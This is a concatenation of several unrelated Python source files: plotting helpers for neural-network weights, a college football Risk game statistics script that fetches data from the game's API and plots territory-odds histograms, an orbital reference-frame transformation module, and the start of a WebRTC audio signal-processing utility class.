for i, (x, t) in enumerate(zip(X, title)):
if x.ndim == 3 or x.ndim == 2:
cmap = plt.cm.Greys_r
elif x.ndim == 4:
cmap = None
else:
raise ValueError('NO support for %d dimensions image!' % x.ndim)
x = tile_raster_images(x, tile_shape, tile_spacing)
if fig is None:
fig = plt.figure()
subplot = fig.add_subplot(n, n, i + 1)
subplot.imshow(x, cmap=cmap)
if t is not None:
subplot.set_title(str(t), fontsize=12)
subplot.axis('off')
fig.tight_layout()
return fig
def plot_confusion_matrix(cm, labels):
from matplotlib import pyplot as plt
title = 'Confusion matrix'
cmap = plt.cm.Blues
# column normalize
if np.max(cm) > 1:
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
else:
cm_normalized = cm
axis = plt.gca()
im = axis.imshow(cm_normalized, interpolation='nearest', cmap=cmap)
axis.set_title(title)
# axis.get_figure().colorbar(im)
tick_marks = np.arange(len(labels))
axis.set_xticks(tick_marks)
axis.set_yticks(tick_marks)
axis.set_xticklabels(labels, rotation=90, fontsize=13)
axis.set_yticklabels(labels, fontsize=13)
axis.set_ylabel('True label')
axis.set_xlabel('Predicted label')
# Turns off grid on the left Axis.
axis.grid(False)
plt.colorbar(im, ax=axis)
# axis.tight_layout()
return axis
def plot_weights(x, keep_aspect=True):
'''
Parameters
----------
x : np.ndarray
2D array
ax : matplotlib.Axis
create by fig.add_subplot, or plt.subplots
colormap : str
colormap alias from plt.cm.Greys = 'Greys' ('spectral')
plt.cm.gist_heat
colorbar : bool, 'all'
whether adding colorbar to plot, if colorbar='all', call this
methods after you add all subplots will create big colorbar
for all your plots
path : str
if path is specified, save png image to given path
Notes
-----
Make sure nrow and ncol in add_subplot is int or this error will show up
- ValueError: The truth value of an array with more than one element is
ambiguous. Use a.any() or a.all()
Example
-------
>>> x = np.random.rand(2000, 1000)
>>> fig = plt.figure()
>>> ax = fig.add_subplot(2, 2, 1)
>>> dnntoolkit.visual.plot_weights(x, ax)
>>> ax = fig.add_subplot(2, 2, 2)
>>> dnntoolkit.visual.plot_weights(x, ax)
>>> ax = fig.add_subplot(2, 2, 3)
>>> dnntoolkit.visual.plot_weights(x, ax)
>>> ax = fig.add_subplot(2, 2, 4)
>>> dnntoolkit.visual.plot_weights(x, ax, path='/Users/trungnt13/tmp/shit.png')
>>> plt.show()
'''
from matplotlib import pyplot as plt
if x.ndim > 2:
raise ValueError('No support for > 2D')
elif x.ndim == 1:
x = x[:, None]
ax = plt.gca()
if keep_aspect:
ax.set_aspect('equal', 'box')
# ax.tick_params(axis='both', which='major', labelsize=6)
ax.set_xticks([])
ax.set_yticks([])
ax.axis('off')
ax.set_title(str(x.shape), fontsize=6)
img = ax.pcolorfast(x, cmap='Greys', alpha=0.8)
plt.grid(True)
plt.colorbar(img, ax=ax)
return ax
def plot_weights4D(x):
'''
Example
-------
>>> # 3D shape
>>> x = np.random.rand(32, 28, 28)
>>> dnntoolkit.visual.plot_conv_weights(x)
'''
shape = x.shape
if len(shape) != 4:
raise ValueError('This function only support 4D weights matrices')
fig = plt.figure()
imgs = []
for i in range(shape[0]):
imgs.append(tile_raster_images(x[i], tile_spacing=(3, 3)))
ncols = int(np.ceil(np.sqrt(shape[0])))
nrows = int(ncols)
count = 0
for i in range(nrows):
for j in range(ncols):
count += 1
# skip
if count > shape[0]:
continue
ax = fig.add_subplot(nrows, ncols, count)
ax.set_aspect('equal', 'box')
ax.set_xticks([])
ax.set_yticks([])
ax.axis('off')
# image data: no idea why pcolorfast flip image vertically
img = ax.pcolorfast(imgs[count - 1][::-1, :], cmap='Reds', alpha=0.9)
plt.tight_layout()
# colorbar
axes = fig.get_axes()
fig.colorbar(img, ax=axes)
return fig
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 23 23:02:12 2020
@author: Connor
This file will be my CFB risk modules.
"""
#
# Imports
#
import requests as reqs
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import erf
_BASE ="https://collegefootballrisk.com/api"
_SEASON = 1
plt.style.use("bmh")
class Territory:
def __init__(self):
self.name = None
self.occupier = None
self.winner = None
self.teams = []
def __repr__(self):
if self.name and self.occupier:
rep = f"""Territory<{self.name} owned by {self.occupier}>"""
elif self.name:
rep = f"""Territory<{self.name}>"""
else:
rep = "Territory<>"
return rep
class Team:
def __init__(self):
self.name = None
self.p_color = None
self.s_color = None
self.power = None
self.chance = None
def __repr__(self):
if self.name:
rep = f"""Team<{self.name}>"""
else:
rep = "Team<>"
return rep
def make_territory_list(day, season=_SEASON):
"""
This simply does the api call for me for the day.
"""
territory_req = reqs.get(_BASE+"/territories",
params={"season": season,
"day": day})
territories_list = territory_req.json()
territory_list = []
for terry in territories_list:
tory = Territory()
tory.name = terry["name"]
territory_list.append(tory)
return territory_list
def populate_territories(territory_list):
for terry in territory_list:
set_territory_data(terry)
return territory_list
def set_territory_data(terry: Territory, day, season=_SEASON):
"""
Idea is to have a large list of Territory objects which is populated via
the /territory/turn api call.
"""
territory_req = reqs.get(_BASE+"/territory/turn",
params={"season": season,
"day": day,
"team": terry.name})
territory_info = territory_req.json()
terry.occupier = territory_info["occupier"]
terry.winner = territory_info["winner"]
for tory in territory_req:
for this_team in tory["teams"]:
team = Team()
team.name = this_team["team"]
team.p_color = this_team["color"]
team.s_color = this_team["secondaryColor"]
team.power = this_team["power"]
def yline(loc, *args, ax=None, **kwargs):
if ax is None:
ylims = plt.ylim()
plt.plot([loc, loc], ylims, *args, **kwargs)
plt.ylim(ylims)
else:
ylims = ax.get_ylim()
ax.plot([loc, loc], ylims, *args, **kwargs)
ax.set_ylim(ylims)
def create_expected_value_hist(
team_name,
day,
prev_num_terry,
num_runs=100000,
season=_SEASON,
axis=None,
save_dir=None
):
"""
``create_expected_value_hist``, as the name suggests, creates an expected
value histogram for a given team and day from the data in the CFB_RISK api.
if ax = None, plt.gca() is used.
"""
try:
team_odds_req = reqs.get(_BASE+"/team/odds",
params={"season": season,
"day": day,
"team": team_name})
team_odds_info = team_odds_req.json()
teams_req = reqs.get(_BASE+"/teams")
team_info = teams_req.json()
p_color = None
for team in team_info:
if team["name"] == team_name:
p_color = team["colors"]["primary"]
s_color = team["colors"]["secondary"]
break
if p_color is None:
raise ValueError(f"Invalid team_name = {team_name}")
p_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(p_color[5:-1].split(",")))
s_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(s_color[5:-1].split(",")))
if p_color[0:3] == (1, 1, 1):
p_color = (0, 0, 0, p_color[3])
if s_color[0:3] == (1, 1, 1):
s_color = (0, 0, 0, s_color[3])
num_territories = len(team_odds_info)
# start with a vector of ones (the "empty territories have a chance of 1)
odds = np.ones((num_territories,))
# for each territoy, exluding "all", compute exact odds
odds = [tory["teamPower"]/tory["territoryPower"] # put the stats, else 1
if tory["territoryPower"]>0 else 1 # if denom != 0
for tory in team_odds_info] # for tory in odds_info
# This calculates the PDF
vals = 1
for k in odds:
vals = np.convolve(vals, [1-k, k])
# axis handling
if axis is None:
fig = plt.figure()
_ax = plt.gca()
else:
_ax = axis
# set up plot values
act = sum([1 if tory["winner"] == team_name else 0 for tory in team_odds_info])
exp = sum(odds)
# Gets the Expected Value numerically to validate expected Odds
mu = np.sum(vals*np.arange(len(vals)))
# Gets the Sigma numerically to validate variance
sigma = np.sqrt(sum(vals*(np.arange(len(vals)) - mu)**2))
dsigma = (act-mu) / sigma
# draw_percentage = stats.norm.pdf(dsigma)*100
if dsigma < 0:
act_color = "#781b0e"
else:
act_color = "#3b8750"
x = np.linspace(0, num_territories, 5000)
y = (1 / (np.sqrt(2 * np.pi * np.power(sigma, 2)))) * \
(np.power(np.e, -(np.power((x - mu), 2) / (2 * np.power(sigma, 2)))))
cdf = 0.5 * (1 + erf((act-exp)/(np.sqrt(2)*sigma)))
_ax.plot(x,y*100, linestyle="-", linewidth=0.5, color="#54585A", label="$X$ ~ $N(\mu, \sigma)$")
_ax.bar(np.arange(num_territories+1), vals*100, 0.9, align="center", color=p_color, edgecolor=s_color)
yline(exp, ax=_ax, linestyle=(0,(2,2)), linewidth=2, color="#081840", label="Expected Value")
yline(act, ax=_ax, linestyle=(0,(2,2)), linewidth=2, color=act_color, label="Actual Territories")
yline(prev_num_terry, ax=_ax, linestyle=(0,(1,1)), linewidth=2, color="#ffb521", label="Prev Num. Territories")
dT = act - prev_num_terry
_ax.set_title(f"Number of Territories Histogram: {team_name}\n$Expected: {exp:2.2f}$, $Actual: {act}$, $\Delta Territories = {dT}$")
_ax.set_xlabel("Number of Territories Won")
_ax.set_ylabel("Percent Chance to Win N Territories (%)")
my_anno_text = f"""$\mu = {mu:2.3f}$
$3\sigma = {3*sigma:2.3f}$
$\Delta\sigma = {dsigma:2.3f}$
$P(Draw) = {100*vals[act]:2.3f}\%$"""
x_min, x_max = _ax.get_xlim()
y_min, y_max = _ax.get_ylim()
if (mu) < (x_max-x_min)//2:
# put both on right:
_ax.legend(loc="upper right")
_ax.text(0.72,
0.08,
my_anno_text,
bbox={'facecolor': 'white', 'alpha': 0.7},
transform=_ax.transAxes)
elif vals[0] > 5:
# top
_ax.legend(loc="upper left")
_ax.text(0.72,
0.80,
my_anno_text,
bbox={'facecolor': 'white', 'alpha': 0.7},
transform=_ax.transAxes)
else:
# left
_ax.legend(loc="upper left")
_ax.text(0.03,
0.10,
my_anno_text,
bbox={'facecolor': 'white', 'alpha': 0.7},
transform=_ax.transAxes)
if save_dir is not None:
fig.savefig(save_dir / f"{team_name.lower().replace(' ', '_')}_territory_hist.png", dpi=150)
return mu, sigma, dsigma, act, cdf
except:
print("")
def create_all_hists(
day,
season=_SEASON,
save_dir=None
):
leader_req = reqs.get(_BASE+"/stats/leaderboard",
params={"season": season,
"day": day})
leaders = leader_req.json()
if day > 1:
leader_req_yest = reqs.get(_BASE+"/stats/leaderboard",
params={"season": season,
"day": day-1})
leader_yest = leader_req_yest.json()
mu = np.ones((len(leaders),))
sig = np.ones((len(leaders),))
dsig = np.ones((len(leaders),))
act = np.ones((len(leaders),))
for ind, leader in enumerate(leaders):
print("Making hist for: ", leader["name"])
if day > 1:
prev_num_terry = [ll for ll in leader_yest if ll["name"] == leader["name"]][0]["territoryCount"]
else:
prev_num_terry = leader["territoryCount"]
try:
mu[ind], sig[ind], dsig[ind], act[ind], cdf = create_expected_value_hist(
leader["name"],
day,
int(prev_num_terry),
season=season,
save_dir=save_dir)
except TypeError as inst:
print("Unable to make hist for ", leader["name"], ". May not have any players today.")
print(inst)
return (min(dsig), leaders[np.argmin(dsig)]["name"]), (max(dsig), leaders[np.argmax(dsig)]["name"])
#%% Run Script with functions above
# HIT CTRL ENTER HERE TO RUN THE DAY'S DATA.
from pathlib import Path
import datetime
date = datetime.date
import os
SAVE_FLAG = True
REPLACE_FLAG = True
if SAVE_FLAG:
figs_base_dir = Path(r"D:\Connor\Documents\GA 2022\Risk\cfb_artifacts")
check_dir = figs_base_dir / f"{date.today().isoformat()}"
# check_dir = figs_base_dir / "2020-04-22"
asserted_dir = figs_base_dir / "temp_dir"
# asserted_dir = check_dir
if not check_dir.exists():
os.mkdir(check_dir)
save_dir = check_dir
else:
if REPLACE_FLAG:
save_dir = check_dir
else:
save_dir = asserted_dir
dt_now = datetime.datetime.now()
deltaT = dt_now-datetime.datetime(2022, 1, 15)
day = deltaT.days
day = 3
# if dt_now.hour >= 14:
# day += 1
# day = 1
# print(f"Generating plots for day={day}...")
mins_team, max_team = create_all_hists(day, save_dir=save_dir)
#%
# day=3
num_days = day
leader_req = reqs.get(_BASE+"/stats/leaderboard",
params={"season": _SEASON,
"day": 1})
leaders = leader_req.json()
leader_list = [(leaders[i]["name"], [np.array([np.nan]*num_days), np.array([np.nan]*num_days), np.append(0, np.array([np.nan]*num_days))]) for i in range(len(leaders))]
team_dict = dict(leader_list)
for day in range(num_days, num_days+1):
print(f"Generating plots for day={day}...")
leader_req = reqs.get(_BASE+"/stats/leaderboard",
params={"season": _SEASON,
"day": day})
leaders = leader_req.json()
leader_req_prev = reqs.get(_BASE+"/stats/leaderboard",
params={"season": _SEASON,
"day": day-1})
leaders_prev = leader_req_prev.json()
leader_list = [(leaders[i]["name"], [np.array([np.nan]*num_days), np.array([np.nan]*num_days), np.append(0, np.array([np.nan]*num_days))]) for i in range(len(leaders))]
team_dict = dict(leader_list)
for ind, leader in enumerate(leaders):
print("Making hist for: ", leader["name"])
try:
prev_data = [ll for ll in leaders_prev if ll["name"] == leader["name"]]
mu, sig, dsig, act, cdf = create_expected_value_hist(
leader["name"],
day,
int(prev_data[0]["territoryCount"]),
season=_SEASON)
prev_day = int(leader["territoryCount"])
# scale the cdf output to some value between 0 and 1
team_dict[leader["name"]][0][day-1] = cdf*2 - 1
team_dict[leader["name"]][1][day-1] = dsig
team_dict[leader["name"]][2][day] = act-prev_day
except TypeError:
print("Unable to make hist for ", leader["name"], ". May not have any players today.")
plt.close()
#%
# step = 0.01
# x = np.arange(-1, 1+step, step)
# unif = np.ones(x.shape)
# out = np.copy(unif)
# for i in range(day):
# out = np.convolve(out, unif)
# out = out / sum(out)
# x = np.linspace(-day, day, len(out))
# plt.plot(x, out)
#%%
# Run after dict is populated
# plt.close("all")
# team_req = reqs.get(_BASE+"/teams")
# team_info = team_req.json()
# # filter team_info to match what exists:
# for team in leader_list:
# team_name = team[0]
# team_uni, team_dsig, team_dt = np.copy(team_dict[team_name])
# for info in team_info:
# if info["name"] == team_name:
# p_color = info["colors"]["primary"].strip()
# s_color = info["colors"]["secondary"].strip()
# p_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(p_color[5:-1].split(",")))
# s_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(s_color[5:-1].split(",")))
# if p_color[0:3] == (1, 1, 1):
# p_color = (0, 0, 0, p_color[3])
# color = p_color
# else:
# if s_color[0:3] == (1, 1, 1):
# s_color = (0, 0, 0, s_color[3])
# color = s_color
# style = "-"
# # if team_name not in ['Alabama', 'Nebraska', 'Oklahoma', 'Stanford', 'Texas A&M', 'Wisconsin']:
# # style = "-"
# # else:
# # if team_name in ["Wisconsin", "Stanford"]:
# # style = "--"
# # elif team_name in ["Texas A&M", "Oklahoma"]:
# # style = "-."
# # else:
# # style = "-"
# fig101 = plt.figure(101, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_uni)+1),
# np.cumsum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_uni)+1),
# np.cumsum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $\sum_{n=1}^{day} (Actual_n - \mu_n)$")
# plt.xlabel("Day")
# plt.ylabel("Cumulative $(Actual_n - \mu_n)$")
# plt.tight_layout()
# fig102 = plt.figure(102, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dsig)+1),
# np.cumsum(team_dsig),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dsig)+1),
# np.cumsum(team_dsig),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $\sum_{n=1}^{day} \Delta\sigma_n$")
# plt.xlabel("Day")
# plt.ylabel("Cumulative $\Delta\sigma_n$")
# plt.tight_layout()
# fig103 = plt.figure(103, figsize=(12,7))
# ax103 = plt.gca()
# ax103.minorticks_on()
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dt)+1),
# np.cumsum(team_dt)+1,
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dt)+1),
# np.cumsum(team_dt)+1,
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $Territories_n$")
# plt.xlabel("Day")
# plt.ylabel("$Territories_n$")
# plt.tight_layout()
# plt.grid(True, which="major")
# plt.grid(True, which="minor", color="#c6c6c6")
# fig104 = plt.figure(104, figsize=(12,7))
# ax104 = plt.gca()
# plt.plot(x,
# out,
# color="#111111",
# linestyle="-",
# marker="",
# alpha=1,
# )
# if sum(~np.isnan(team_dsig)) > 20:
# yline(np.sum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# yline(np.sum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Overall Luck Histogram")
# plt.xlabel("Value")
# plt.ylabel("Odds")
# plt.tight_layout()
# plt.grid(True, which="major")
# plt.grid(True, which="minor", color="#c6c6c6")
# fig101.savefig(save_dir / "delta_exp_and_act_per_day.png", dpi=200)
# fig102.savefig(save_dir / "delta_sigma_per_day.png", dpi=200)
# fig103.savefig(save_dir / "territories_per_day.png", dpi=200)
# fig104.savefig(save_dir / "overall_luck_histogram.png", dpi=200)
# plt.figure(104, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dt)+1),
# team_dt,
# color=color,
# linestyle=style,
# marker=".",
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dt)+1),
# team_dt,
# color=color,
# linestyle=style,
# marker=".",
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $Territories_n$")
# plt.xlabel("Day")
# plt.ylabel("$Territories_n$")
# plt.tight_layout()
# Wanna make a MC sim to see the chance of a team getting +10 cumulative sigma
# or -10 cumulative sigma
# is this like, frequently going to happen?
# Roll 50 turns of normal random variables 100,000 times for 100 teams
# see what the max and min of each "run" is and save that tuple
#%%
# import numpy as np
# num_runs = 100000
# max_vals = np.array([])
# min_vals = np.array([])
# for i in range(num_runs):
# game = np.random.randn(10,50)
# run = np.sum(game, axis=0)
# run_max, run_min = np.max(run), np.min(run)
# max_vals = np.append(max_vals, run_max)
# min_vals = np.append(min_vals, run_min)
# #%%
# max_vals.sort()
# min_vals.sort()
# max_st = int(np.floor(max_vals[0]))
# max_end = int(np.ceil(max_vals[-1])+1)
# min_st = int(np.floor(min_vals[0]))
# min_end = int(np.ceil(min_vals[-1])+1)
# max_counts = np.array([])
# min_counts = np.array([])
# max_bins = np.array([])
# min_bins = np.array([])
# for i in range(max_st, max_end):
# cnts = sum((max_vals < i+1) & (max_vals >= i))
# max_counts = np.append(cnts, max_counts)
# max_bins = np.append(i, max_bins)
# for i in range(min_st, min_end):
# cnts = sum((min_vals < i+1) & (min_vals >= i))
# min_counts = np.append(cnts, min_counts)
# min_bins = np.append(i, min_bins)
# plt.figure()
# plt.bar(max_bins, max_counts / 1000)
# plt.figure()
# plt.bar(min_bins, min_counts / 1000) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This module define the Frames available for computation and their relations
to each other.
The relations may be circular, thanks to the use of the Node class.
.. code-block:: text
,---. ,-------. ,----.
|G50|---bias---|EME2000|..bias..|GCRF|
`---' `-------' `----'
| |
Precession |
| |
,---. Precession
|MOD| +
`---' Nutation
| + model corrections
Nutation |
+ model corrections |
| |
,----. ,---. ,----.
|TEME|--Equinox--|TOD| |CIRF|
`----' `---' `----'
| |
Sideral time Sideral time
| |
,---. ,----.
|PEF| |TIRF|
`---' `----'
\\ /
IAU 1980 IAU 2010
Earth Orientation Earth Orientation
Parameters Parameters
\\ /
,-----. ,----.
|WGS84|--identity--|ITRF|
`-----' `----'
"""
import sys
import logging
import numpy as np
from ..errors import UnknownFrameError
from ..constants import Earth
from ..utils.matrix import rot3
from ..utils.node import Node
from . import iau1980, iau2010
from .local import to_qsw, to_tnw
CIO = ["ITRF", "TIRF", "CIRF", "GCRF"]
IAU1980 = ["TOD", "MOD"]
OTHER = ["EME2000", "TEME", "WGS84", "PEF", "G50"]
__all__ = CIO + IAU1980 + OTHER + ["get_frame"]
log = logging.getLogger(__name__)
class FrameCache(dict):
"""This class is here to emulate module behavior for dynamically
created frames.
It's useful when pickle is involved (e.g. multiprocessing)
"""
def __getattr__(self, name):
if name not in self:
raise AttributeError(name)
return self[name]
dynamic = FrameCache()
"""This dictionary contains all the frames. Those defined here, and those created on the fly
by the developer.
"""
sys.modules[__name__ + ".dynamic"] = dynamic
def get_frame(frame):
"""Frame factory
Args:
frame (str): name of the desired frame
Return:
~beyond.frames.frames.Frame
"""
if frame not in dynamic.keys():
raise UnknownFrameError(frame)
return dynamic[frame]
class _MetaFrame(type, Node):
"""This MetaClass is here to join the behaviors of ``type`` and ``Node``
"""
def __init__(cls, name, bases, dct):
bypass = dct.pop("bypass", False)
super(_MetaFrame, cls).__init__(name, bases, dct)
super(type, cls).__init__(name)
if not bypass and cls.__name__ in dynamic:
log.warning(
"A frame with the name '%s' is already registered. Overriding"
% cls.__name__
)
cls.__module__ = __name__ + ".dynamic"
# Making the frame available to the get_frame function
dynamic[cls.__name__] = cls
def __repr__(cls): # pragma: no cover
return "<Frame '{}'>".format(cls.name)
class Frame(metaclass=_MetaFrame):
"""Frame base class
"""
center = Earth
def __init__(self, date, orbit):
"""
Args:
date (~beyond.utils.Date)
orbit (numpy.ndarray)
"""
self.date = date
self.orbit = orbit
def __str__(self): # pragma: no cover
return self.name
def __repr__(self): # pragma: no cover
return "<Frame obj '{}'>".format(self.__class__.__name__)
@classmethod
def _convert(cls, x=None, y=None):
m = np.identity(6)
if x is not None:
m[:3, :3] = x
if y is not None:
m[3:, 3:] = y
return m
def transform(self, new_frame):
"""Change the frame of the orbit
Args:
new_frame (str)
Return:
numpy.ndarray
"""
steps = self.__class__.steps(new_frame)
orbit = self.orbit
for _from, _to in steps:
from_obj = _from(self.date, orbit)
direct = "_to_%s" % _to
if hasattr(from_obj, direct):
rotation, offset = getattr(from_obj, direct)()
else:
to_obj = _to(self.date, orbit)
inverse = "_to_%s" % _from
if hasattr(to_obj, inverse):
rotation, offset = getattr(to_obj, inverse)()
rotation = rotation.T
offset = -offset
else:
raise NotImplementedError(
"Unknown transformation {} to {}".format(_from, _to)
)
if getattr(_from, "_rotation_before_translation", False):
# In case of topocentric frame, the rotation is done before the translation
orbit = offset + (rotation @ orbit)
else:
orbit = rotation @ (offset + orbit)
return orbit
class TEME(Frame):
"""True Equator Mean Equinox"""
orientation = "TEME"
def _to_TOD(self):
equin = iau1980.equinox(
self.date, eop_correction=False, terms=4, kinematic=False
)
m = rot3(-np.deg2rad(equin))
return self._convert(m, m), np.zeros(6)
class GTOD(Frame):
"""Greenwich True Of Date"""
orientation = "GTOD"
class WGS84(Frame):
"""World Geodetic System 1984"""
orientation = "WGS84"
def _to_ITRF(self):
return np.identity(6), np.zeros(6)
class PEF(Frame):
"""Pseudo Earth Fixed"""
orientation = "PEF"
def _to_TOD(self):
m = iau1980.sideral(self.date, model="apparent", eop_correction=False)
offset = np.zeros(6)
offset[3:] = np.cross(iau1980.rate(self.date), self.orbit[:3])
return self._convert(m, m), offset
class TOD(Frame):
"""True (Equator) Of Date"""
orientation = "TOD"
def _to_MOD(self):
m = iau1980.nutation(self.date, eop_correction=False)
return self._convert(m, m), np.zeros(6)
class MOD(Frame):
"""Mean (Equator) Of Date"""
orientation = "MOD"
def _to_EME2000(self):
m = iau1980.precesion(self.date)
return self._convert(m, m), np.zeros(6)
class EME2000(Frame):
"""EME2000 inertial frame (also known as J2000)"""
orientation = "EME2000"
class ITRF(Frame):
"""International Terrestrial Reference Frame"""
orientation = "ITRF"
def _to_PEF(self):
m = iau1980.earth_orientation(self.date)
return self._convert(m, m), np.zeros(6)
def _to_TIRF(self):
m = iau2010.earth_orientation(self.date)
return self._convert(m, m), np.zeros(6)
class TIRF(Frame):
"""Terrestrial Intermediate Reference Frame"""
orientation = "TIRF"
def _to_CIRF(self):
m = iau2010.sideral(self.date)
offset = np.zeros(6)
offset[3:] = np.cross(iau2010.rate(self.date), self.orbit[:3])
return self._convert(m, m), offset
class CIRF(Frame):
"""Celestial Intermediate Reference Frame"""
orientation = "CIRF"
def _to_GCRF(self):
m = iau2010.precesion_nutation(self.date)
return self._convert(m, m), np.zeros(6)
class GCRF(Frame):
"""Geocentric Celestial Reference Frame"""
orientation = "GCRF"
class G50(Frame):
"""Gamma50 Reference Frame
"""
orientation = "G50"
def _to_EME2000(self):
m = [
[0.9999256794956877, -0.0111814832204662, -0.0048590038153592],
[0.0111814832391717, 0.9999374848933135, -0.0000271625947142],
[0.0048590037723143, -0.0000271702937440, 0.9999881946023742],
]
return self._convert(m, m), np.zeros(6)
def orbit2frame(name, ref_orbit, orientation=None, center=None, bypass=False):
"""Create a frame based on a Orbit or Ephem object.
Args:
name (str): Name to give the created frame
ref_orbit (Orbit or Ephem):
orientation (str): Orientation of the created frame
bypass (bool): By-pass the warning when creating a frame with an already
taken name
Return:
Frame:
If orientation is ``None``, the new frame will keep the orientation of the
reference frame of the Orbit and move along with the orbit.
Other acceptable values are ``"QSW"`` (and its aliases "LVLH" and "RSW") or ``"TNW"``.
See :py:func:`~beyond.frames.local.to_qsw` and :py:func:`~beyond.frames.local.to_tnw`
for informations regarding these orientations.
"""
if orientation is None:
orientation = ref_orbit.frame.orientation
elif orientation.upper() in ("RSW", "LVLH"):
orientation = "QSW"
elif orientation.upper() not in ("QSW", "TNW"):
raise ValueError("Unknown orientation '%s'" % orientation)
if center is None:
center = Earth
def _to_parent_frame(self):
"""Conversion from orbit frame to parent frame
"""
offset = ref_orbit.propagate(self.date).base.copy()
if orientation.upper() in ("QSW", "TNW"):
# propagation of the reference orbit to the date of the
# converted orbit
orb = ref_orbit.propagate(self.date)
m = to_qsw(orb) if orientation.upper() == "QSW" else to_tnw(orb)
# we transpose the matrix because it represents the conversion
# from inertial to local frame, and we'd like the other way around
rotation = Frame._convert(m, m).T
else:
# The orientation is the same as the parent reference frame
rotation = np.identity(6)
return rotation, offset
# define the name of the method of conversion
mtd = "_to_%s" % ref_orbit.frame.__name__
# dictionary which defines attributes of the created class
dct = {
mtd: _to_parent_frame,
"orientation": orientation,
"center": center,
"bypass": bypass,
}
# Creation of the class
cls = _MetaFrame(name, (Frame,), dct)
# Link to the parent
cls + ref_orbit.frame
return cls
WGS84 + ITRF + PEF + TOD + MOD + EME2000
TOD + TEME
# EME2000 + GCRF
ITRF + TIRF + CIRF + GCRF
EME2000 + G50
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Signal processing utility module.
"""
import array
import logging
import os
import sys
try:
import numpy as np
except ImportError:
logging.critical('Cannot import the third-party Python package numpy')
sys.exit(1)
try:
import pydub
import pydub.generators
except ImportError:
logging.critical('Cannot import the third-party Python package pydub')
sys.exit(1)
try:
import scipy.signal
except ImportError:
logging.critical('Cannot import the third-party Python package scipy')
sys.exit(1)
from . import exceptions
class SignalProcessingUtils(object):
"""Collection of signal processing utilities.
"""
def __init__(self):
pass
@classmethod
def LoadWav(cls, filepath, channels=1):
"""Loads wav file.
Args:
filepath: path to the wav audio track file to load.
channels: number of channels (downmixing to mono by default).
Returns:
AudioSegment instance.
"""
if not os.path.exists(filepath):
logging.error('cannot find the <%s> audio track file', filepath)
raise exceptions.FileNotFoundError()
return pydub.AudioSegment.from_file(
filepath, format='wav', channels=channels)
@classmethod
def SaveWav(cls, output_filepath, signal):
"""Saves wav file.
Args:
output_filepath: path to the wav audio track file to save.
signal: AudioSegment instance.
"""
return signal.export(output_filepath, format='wav')
@classmethod
def CountSamples(cls, signal):
"""Number of samples per channel.
Args:
signal: AudioSegment instance.
Returns:
An integer.
"""
number_of_samples = len(signal.get_array_of_samples())
assert signal.channels > 0
assert number_of_samples % signal.channels == 0
return number_of_samples / signal.channels
@classmethod
def GenerateWhiteNoise(cls, signal):
"""Generates white noise.
White noise is generated with the same duration and in the same format as a
given signal.
Args:
signal: AudioSegment instance.
Return:
AudioSegment instance.
"""
generator = pydub.generators.WhiteNoise(
sample_rate=signal.frame_rate,
bit_depth=signal.sample_width * 8)
return generator.to_audio_segment(
duration=len(signal),
volume=0.0)
@classmethod
def ApplyImpulseResponse(cls, signal, impulse_response):
"""Applies an impulse response to a signal.
Args:
signal: AudioSegment instance.
impulse_response: list or numpy vector of float values.
Returns:
AudioSegment instance.
"""
# Get samples.
assert signal.channels == 1, (
'multiple-channel recordings not supported')
samples = signal.get_array_of_samples()
# Convolve.
logging.info('applying %d order impulse response to a signal lasting %d ms',
len(impulse_response), len(signal))
convolved_samples = scipy.signal.fftconvolve(
in1=samples,
in2=impulse_response,
mode='full').astype(np.int16)
logging.info('convolution computed')
# Cast.
convolved_samples = array.array(signal.array_type, convolved_samples)
# Verify.
logging.debug('signal length: %d samples', len(samples))
logging.debug('convolved signal length: %d samples', len(convolved_samples))
assert len(convolved_samples) > len(samples)
# Generate convolved signal AudioSegment instance.
convolved_signal = pydub.AudioSegment(
data=convolved_samples,
metadata={
'sample_width': signal.sample_width,
'frame_rate': signal.frame_rate,
'frame_width': signal.frame_width,
'channels': signal.channels,
})
assert len(convolved_signal) > len(signal)
return convolved_signal
@classmethod
def Normalize(cls, signal):
"""Normalizes a signal.
Args:
signal: AudioSegment instance.
Returns:
An AudioSegment instance.
"""
return signal.apply_gain(-signal.max_dBFS)
@classmethod
